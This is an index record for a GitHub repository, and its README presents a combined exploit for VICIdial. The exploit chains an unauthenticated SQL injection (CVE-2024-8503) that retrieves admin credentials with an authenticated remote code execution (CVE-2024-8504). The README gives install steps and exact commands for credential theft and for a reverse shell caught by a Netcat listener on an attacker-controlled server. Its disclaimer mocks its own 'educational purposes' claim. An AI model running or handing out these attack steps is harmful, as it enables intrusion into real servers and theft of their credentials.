{"id":22799787,"url":"https://github.com/chocapikk/cve-2024-8504","last_synced_at":"2025-08-05T02:33:22.189Z","repository":{"id":257071414,"uuid":"857247047","full_name":"Chocapikk/CVE-2024-8504","owner":"Chocapikk","description":"VICIdial Unauthenticated SQLi to RCE Exploit (CVE-2024-8503 and CVE-2024-8504)","archived":false,"fork":false,"pushed_at":"2024-09-15T21:34:35.000Z","size":111,"stargazers_count":39,"open_issues_count":1,"forks_count":5,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-04-19T19:09:25.360Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Chocapikk.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-09-14T06:27:11.000Z","updated_at":"2025-03-23T19:38:37.000Z","dependencies_parsed_at":null,"dependency_job_id":"90092ea1-1cdb-4a99-8af1-3c4d94c7bb1e","html_url":"https://github.com/Chocapikk/CVE-2024-8504","commit_stats":null,"previous_names":["chocapikk/cve-2024-8504"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Chocapikk/CVE-2024-8504","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504/manifests","owner_u
rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Chocapikk","download_url":"https://codeload.github.com/Chocapikk/CVE-2024-8504/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":268823402,"owners_count":24313043,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-05T02:00:12.334Z","response_time":2576,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-12T07:09:58.363Z","updated_at":"2025-08-05T02:33:22.174Z","avatar_url":"https://github.com/Chocapikk.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ⚡️ Exploit for CVE-2024-8504 \u0026 CVE-2024-8503: SQLi and RCE ⚡️\n\n![Banner](./img/banner.png)\n## 🚨 Overview\n\nThis repository contains a combined exploit for two critical vulnerabilities discovered in **[VICIdial](https://vicidial.com)** by **[KoreLogic](https://korelogic.com)**:\n- **CVE-2024-8503**: Unauthenticated SQL Injection (SQLi)\n- **CVE-2024-8504**: Authenticated Remote Code Execution (RCE)\n\nThese vulnerabilities allow an attacker to retrieve administrative credentials through SQLi and ultimately execute arbitrary code on the target server via an RCE attack.\n\n### 🛑 Advisory:\n\n- **Vulnerability Type**: SQL Injection (CVE-2024-8503) and RCE 
(CVE-2024-8504)\n- **Affected Software**: VICIdial\n- **Severity**: Critical\n- **CVE IDs**: \n  - **CVE-2024-8503** (SQLi)\n  - **CVE-2024-8504** (RCE)\n\n### 🔗 Vulnerability Advisories:\n- [CVE-2024-8503 - SQLi Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt)\n- [CVE-2024-8504 - RCE Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt)\n\n## ⚙️ Features\n\nThis exploit tool allows you to either:\n1. **Retrieve administrator credentials via SQLi** (CVE-2024-8503)\n2. **Achieve RCE via poisoned recording files** (CVE-2024-8504)\n\nThe tool is based on KoreLogic’s original research, with enhancements made to:\n- Separate the **SQLi** and **RCE** functionalities for more flexibility.\n- Improve the **user experience** by simplifying execution and error handling.\n- Provide a cleaner and more **aesthetic output** using `rich_click`.\n\n## 📜 Requirements\n\nTo use this exploit, you need:\n- Python 3.10+\n- A **server** where you can open TWO ports \n- A target server running a vulnerable **VICIdial** instance\n- Dependencies installed via `requirements.txt`\n\n## ⚙️ Installation\n\n1. Clone the repository:\n\n```bash\ngit clone https://github.com/Chocapikk/CVE-2024-8504\ncd CVE-2024-8504\n```\n\n2. 
Install the dependencies:\n\n```bash\npip install -r requirements.txt\n```\n\n## 🛠️ Usage\n\n### SQLi Mode (Retrieve Admin Credentials)\n\nTo perform only the **SQL Injection** attack and retrieve the administrative credentials, use the following command:\n\n```bash\npython exploit.py -u https://example.org\n```\n\n### RCE Mode (Remote Code Execution)\n\nOnce you have the administrator credentials, or if you already know them, you can launch a full RCE attack by running the following command:\n\n```bash\npython exploit.py -b -u https://example.org \\\n            -wh \u003cwebserver IP\u003e -wp \u003cwebserver port\u003e \\\n            -lh \u003cyour IP\u003e -lp \u003cyour listener port\u003e  \\\n            -un \u003cadmin username\u003e -pw \u003cadmin password\u003e\n```\n\nThe `-b` option binds the reverse shell to your listener IP and port. This command will start a **Netcat** listener on the specified port and wait for an incoming reverse shell.\n\n\u003e ⚠️ Replace `\u003cwebserver IP\u003e` and `\u003cwebserver port\u003e` with the values of your malicious webserver (where you execute the exploit) used to capture the reverse shell or inject payloads.\n\n## 🌐 Usage Example with a server\n\nIt’s recommended to use a server where you can open ports to listen for reverse shells. 
Below are examples for both SQLi and RCE:\n\n### Example for SQLi:\n\n```bash\npython exploit.py -u https://example.org\n```\n\n### Example for RCE:\n\n```bash\npython exploit.py -u https://example.org -wh \u003cserver IP\u003e -wp 5000 -lh \u003cserver IP\u003e -lp 1337 -un admin -pw password123 -b\n```\n\n## ✨ Improvements\n\n- **Separation of vulnerabilities**: The tool clearly separates the execution of the **SQLi** and **RCE** functionalities, making it more flexible for different exploitation scenarios.\n- **Cleaner output**: The output is more structured and easier to read, highlighting key steps and results.\n- **Bug fixes**: Some bugs from the original exploit have been fixed to ensure smoother execution.\n\n## 📄 Acknowledgements\n\nThis exploit is based on the original work by **[KoreLogic](https://korelogic.com)**, and full credit goes to them for the discovery and initial PoC:\n- [CVE-2024-8503 - SQLi Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt)\n- [CVE-2024-8504 - RCE Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt)\n\nSpecial thanks to KoreLogic for the foundational work. This tool was adapted to improve ease of use, fix bugs, and better separate the two vulnerabilities.\n\n## 🛡️ Disclaimer\n\nThis tool is for **educational purposes** only (lol). Use of this exploit without explicit permission from the system owner is illegal. The author assumes no responsibility for the misuse of this tool. Scambaiters, you're welcome.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2024-8504","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchocapikk%2Fcve-2024-8504","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2024-8504/lists"}